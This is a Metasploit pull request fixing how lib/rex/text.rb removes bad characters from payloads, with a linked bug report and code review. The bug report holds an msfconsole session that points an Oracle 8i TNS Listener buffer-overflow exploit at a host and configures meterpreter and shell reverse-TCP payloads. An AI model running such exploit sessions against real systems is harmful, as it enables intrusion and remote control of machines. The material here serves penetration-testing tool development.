### PR TITLE
Fix #5907 by replacing String#delete with String#gsub

### LINKED ISSUE #5907: Oracle TNS Listener Service Exploit fails to encode payloads
An individual on a mailing list that I'm on identified a module that was failing to encode pretty much any of the payloads. The only one that I found that worked was the `windows/exec` payloads. It has 30 some odd bad chars. Curious if this can be improved or identified if there is a tweak that can be made to allow meterpreter to encode in a way that will work.

**Name**: Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
**Module**: exploit/windows/oracle/tns_service_name
```
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.11.4-dev-acc24df4                 ]
+ -- --=[ 1476 exploits - 859 auxiliary - 243 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/oracle/tns_service_name 
msf exploit(tns_service_name) > show options

Module options (exploit/windows/oracle/tns_service_name):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  1521             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Oracle 8.1.7.0.0 Standard Edition (Windows 2000)


msf exploit(tns_service_name) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(tns_service_name) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(tns_service_name) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(tns_service_name) > show options

Module options (exploit/windows/oracle/tns_service_name):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.100    yes       The target address
   RPORT  1521             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.105    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Oracle 8.1.7.0.0 Standard Edition (Windows 2000)


msf exploit(tns_service_name) > run

[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(tns_service_name) > set PAYLOAD generic/shell_reverse_tcp 
PAYLOAD => generic/shell_reverse_tcp
msf exploit(tns_service_name) > show options

Module options (exploit/windows/oracle/tns_service_name):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.100    yes       The target address
   RPORT  1521             yes       The target port


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.105    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Oracle 8.1.7.0.0 Standard Edition (Windows 2000)


msf exploit(tns_service_name) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(tns_service_name) > set PAYLOAD windows/exec 
PAYLOAD => windows/exec
msf exploit(tns_service_name) > set CMD notepad.exe
CMD => notepad.exe
msf exploit(tns_service_name) > exploit
```
with windows/exec notepad.exe was started

### PR DESCRIPTION
**Pull request by hdm**
The String#delete method treats the argument as a transliteration. This means that hyphens (-) either
turn into a character range or they throw an error if the range is invalid. This ended up breaking
one encoder and may be the root cause of other hard-to-reproduce bugs.

### CODE REVIEW

**Comment by hmoore-r7** [comment]
Explanation of the String#delete issue @ https://gist.github.com/hmoore-r7/efe964794c66a354eabe

File: lib/rex/text.rb [hunk 1]
```diff
@@ -1531,7 +1532,8 @@ def self.remove_badchars(data, badchars = '')
   # @param keepers [String]
   # @return [String] All characters not contained in +keepers+
   def self.charset_exclude(keepers)
-    [*(0..255)].pack('C*').delete(keepers)
+    keepers_pat = keepers.unpack("C*").map{|c| "\\x%.2x" % c}.join
+    [*(0..255)].pack("C*").gsub(/[^#{keepers_pat}]/n, '')
```
Comment (jlee-r7) [inline lib/rex/text.rb]: Since you're already treating these as bytes instead of characters, it's easier to just delete them from the range/array, with something like this:
```ruby
def self.charset_exclude(keepers)
  excluded_bytes = [*(0..255)] - keepers.unpack("C*")
  excluded_bytes.pack("C*")
end
```

File: lib/rex/text.rb [hunk 2]
```diff
@@ -1522,7 +1522,8 @@ def self.badchar_index(data, badchars = '')
   # @param data [#delete]
   # @param badchars [String] A list of characters considered to be bad
   def self.remove_badchars(data, badchars = '')
-    data.delete(badchars)
+    badchars_pat = badchars.unpack("C*").map{|c| "\\x%.2x" % c}.join
+    data.gsub!(/[#{badchars_pat}]/n, '')
```
Comment (jlee-r7) [inline lib/rex/text.rb]: `String#gsub!` will return `nil` if it didn't substitute anything which will be different behavior from what happened before with `#delete`.

`String#gsub` is safer

Comment (hmoore-r7) [inline lib/rex/text.rb]: The method definition claims to modify the string in place. I agree we should return the string just in case the caller expects it though, but we can't use gsub.

File: lib/rex/text.rb (hunk 1 above)
Comment (hmoore-r7) [inline lib/rex/text.rb]: Agree, thanks!

File: lib/rex/text.rb (hunk 2 above)
Comment (jlee-r7) [inline lib/rex/text.rb]: Whoa, that comment is a lie, then.  `String#delete` does *not* modify in place.
```
2.1.5 :001 > a = "asdf"; a.delete 'asdf'
 => "" 
2.1.5 :002 > a
 => "asdf" 
```

Comment (jlee-r7) [inline lib/rex/text.rb]: And what's worse is that I wrote the lie.  :cry:
```
93bddd90 (jlee-r7         2013-01-09 21:45:47 -0600) 1520   # Modifies +data+ in place
```

Comment (hmoore-r7) [inline lib/rex/text.rb]: Holy crap, that is even scarier :)

Comment (hmoore-r7) [inline lib/rex/text.rb]: I guess no caller depended on the in-place modification or it wouldn't have worked at all. The current code (last commit) should handle both cases at least.

Comment (hmoore-r7) [inline lib/rex/text.rb]: I wonder if the behavior changed between Ruby 1.8 and today?

**Comment by hmoore-r7** [comment]
Hurrah, a test failure. Will keep digging on this.

**Comment by hmoore-r7** [comment]
This should be good to go
